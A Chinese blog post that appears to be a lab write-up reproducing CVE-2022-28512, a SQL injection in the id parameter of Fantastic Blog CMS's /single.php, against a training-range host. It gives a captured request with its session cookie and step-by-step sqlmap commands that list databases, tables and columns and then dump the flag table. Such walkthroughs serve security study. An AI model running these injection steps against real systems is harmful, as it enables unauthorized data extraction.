CVE-2022-28512漏洞靶场复现

靶标介绍:
Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。

查找目标

进入主页面

到处翻了一下,发现点击跳转,找到/single.php

找到参数id

抓包:

GET /single.php?id=4 HTTP/2
Host: eci-2zed7zlur1hwezd8denx.cloudeci1.ichunqiu.com:80
Cookie: BLOG_ADMIN=8i23klhfnl1b4lcdcqsbk8unpo
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://eci-2zed7zlur1hwezd8denx.cloudeci1.ichunqiu.com:80/index.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: close


记录sqlmap所需http头参数:

--cookie="BLOG_ADMIN=8i23klhfnl1b4lcdcqsbk8unpo"

--user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0"

sqlmap攻击

爆库:

python sqlmap.py -u "https://eci-2zed7zlur1hwezd8denx.cloudeci1.ichunqiu.com:80/single.php?id=4" --cookie="BLOG_ADMIN=8i23klhfnl1b4lcdcqsbk8unpo" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0" --batch -dbs

爆表:

python sqlmap.py -u "https://eci-2zed7zlur1hwezd8denx.cloudeci1.ichunqiu.com:80/single.php?id=4" --cookie="BLOG_ADMIN=8i23klhfnl1b4lcdcqsbk8unpo" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0" -D ctf --batch -tables

爆列:

python sqlmap.py -u "https://eci-2zed7zlur1hwezd8denx.cloudeci1.ichunqiu.com:80/single.php?id=4" --cookie="BLOG_ADMIN=8i23klhfnl1b4lcdcqsbk8unpo" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0" -D ctf -T flag --batch -columns

爆字段:

python sqlmap.py -u "https://eci-2zed7zlur1hwezd8denx.cloudeci1.ichunqiu.com:80/single.php?id=4" --cookie="BLOG_ADMIN=8i23klhfnl1b4lcdcqsbk8unpo" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0" -D ctf -T flag -C flag --batch -dump

posted @ 2025-10-14 15:15  v1c0  阅读(4)  评论(0)    收藏  举报